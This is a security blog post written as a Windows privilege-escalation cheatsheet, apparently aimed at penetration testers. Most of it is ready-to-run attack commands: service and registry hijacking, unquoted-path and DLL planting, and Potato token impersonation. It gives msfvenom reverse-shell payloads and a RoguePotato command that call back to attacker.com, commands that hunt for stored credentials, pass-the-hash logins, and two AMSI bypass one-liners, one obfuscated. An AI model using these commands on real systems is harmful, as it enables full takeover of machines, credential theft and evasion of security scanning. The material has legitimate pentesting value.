← Back to writing
Tools & Cheatsheets

Windows Privilege Escalation

Dec 01, 2024
3 min read
lawbyte

Windows privilege escalation covers a wide range of techniques from unquoted service paths to token impersonation. This cheatsheet covers the most reliable techniques with exact commands for each.

Automated Enumeration

# WinPEAS
.\winPEASx64.exe
.\winPEASx64.exe quiet      # reduced output
.\winPEASx64.exe systeminfo # only system info

# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

# SharpUp
.\SharpUp.exe

System Enumeration

# System info
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
whoami /all              # current user + groups + privileges
whoami /priv             # privileges only
net user                 # list users
net localgroup administrators  # admin group members
net user username        # details on specific user

# Environment
set PATH
echo %USERNAME% %USERDOMAIN% %COMPUTERNAME%

# Running processes
tasklist /SVC            # processes with services
Get-Process | Sort CPU -Descending

Service Misconfigurations

Weak service permissions

# Find services where non-admins have write permission
sc.exe qc <servicename>
accesschk.exe -uwcqv "Authenticated Users" *   # Sysinternals
accesschk.exe /accepteula -uwcqv "Everyone" *

# If you have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG:
sc.exe config <service> binpath= "cmd.exe /c whoami > C:\output.txt"
sc.exe stop <service>
sc.exe start <service>

Unquoted service paths

If a service binary path has spaces and isn’t quoted, Windows tries multiple paths:

Path: C:\Program Files\My App\service.exe

Windows tries:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v """" | findstr /i /v "C:\Windows"

# Or with PowerSploit
Get-ServiceUnquoted

# Exploit: place malicious executable at the first writable location
# e.g., C:\Program.exe or C:\Program Files\My.exe
copy C:\evil.exe "C:\Program Files\My.exe"
Restart-Service <servicename>

Writable service binary

# Check if the service binary itself is writable
accesschk.exe -quvw "C:\Program Files\Vulnerable\service.exe"
cacls "C:\Program Files\Vulnerable\service.exe"

# If writable, replace with malicious binary
copy /Y C:\evil.exe "C:\Program Files\Vulnerable\service.exe"
Restart-Service <servicename>

AlwaysInstallElevated

If both these registry keys are set to 1, MSI files run with SYSTEM privileges:

# Check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Exploit: create MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Insecure Registry Permissions

# Check registry key permissions for autorun entries
accesschk.exe -kvuqsw hklm\System\CurrentControlSet\services

# If writable, modify the ImagePath
reg add HKLM\SYSTEM\CurrentControlSet\Services\<SvcName> /v ImagePath /t REG_EXPAND_SZ /d "C:\evil.exe" /f

Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath

# Check if task binary is writable
schtasks /query /tn "TaskName" /fo LIST | findstr "Task To Run"
accesschk.exe -quvw "C:\path\to\task\binary.exe"

# Also check if the folder containing the binary is writable
icacls "C:\path\to\task\"

Token Impersonation (Potato Attacks)

When you have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:

whoami /priv | findstr /i "impersonate\|assignprimarytoken"

Hot Potato / JuicyPotato (older Windows)

# JuicyPotato (Windows ≤ 2019)
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\out.txt" -t *

PrintSpoofer (Windows 10 / Server 2019)

PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "powershell -c whoami"

RoguePotato / GodPotato (newer systems)

GodPotato.exe -cmd "cmd /c whoami"
RoguePotato.exe -r attacker.com -e "cmd.exe /c whoami"

Meterpreter getsystem

meterpreter > getsystem
# Tries 3 techniques automatically

DLL Hijacking

Windows loads DLLs in this order:

  1. Known DLLs (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs)
  2. Application directory
  3. System directory (C:\Windows\System32)
  4. PATH directories
# Find applications loading missing DLLs with Procmon filter:
# Process Name is target.exe
# Path ends with .dll
# Result is NAME NOT FOUND

# Check if application directory is writable
icacls "C:\Program Files\Target\"

# Create malicious DLL (DLL_PROCESS_ATTACH is called on load)
# msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f dll -o missing.dll
copy missing.dll "C:\Program Files\Target\missing.dll"
Restart-Service TargetService

Stored Credentials

# Windows Credential Manager
cmdkey /list
runas /savecred /user:admin cmd.exe

# Registry: AutoLogon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Config files
findstr /si "password" *.txt *.xml *.config *.ini
dir /s /b *.config *.xml *.txt | findstr /i pass

# Unattend.xml / Sysprep
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\system32\sysprep\unattend.xml

# MSSQL credentials
dir /s /b *.udl
reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server" /s

Pass the Hash

# With compromised NTLM hash
evil-winrm -i 192.168.1.100 -u Administrator -H "NTLM_HASH"
impacket-psexec Administrator@192.168.1.100 -hashes :NTLM_HASH
impacket-wmiexec Administrator@192.168.1.100 -hashes :NTLM_HASH
crackmapexec smb 192.168.1.100 -u Administrator -H NTLM_HASH

PowerShell AMSI Bypass

# Bypass AMSI before running tools
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Or
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.'+$b+$a+'Utils'));
$z=$Ref.GetField(('am'+$a+'InitFailed'),'NonPublic,Static');$z.SetValue($null,$true)

Windows Privesc Checklist

  • whoami /priv — SeImpersonatePrivilege / SeDebugPrivilege
  • Unquoted service paths
  • Weak service binary permissions
  • AlwaysInstallElevated registry keys
  • Writable PATH directories
  • Scheduled tasks with writable binaries
  • DLL hijacking in writable directories
  • Stored credentials (cmdkey, registry, config files)
  • Autologon credentials in registry
  • AutoRun registry entries with writable paths
  • GPP credentials in SYSVOL
#cheatsheet #windows #post-exploitation #privesc
Author lawbyte
Link https://lbyte.id/2024/12/01/tools/post-exploitation/windows-privilege-escalation/
License CC BY-NC-SA 4.0
← Previous Android WebView Security Next → Impacket Tools Guide

Discussion

Leave a comment · All fields required · No spam

No comments yet. Be the first.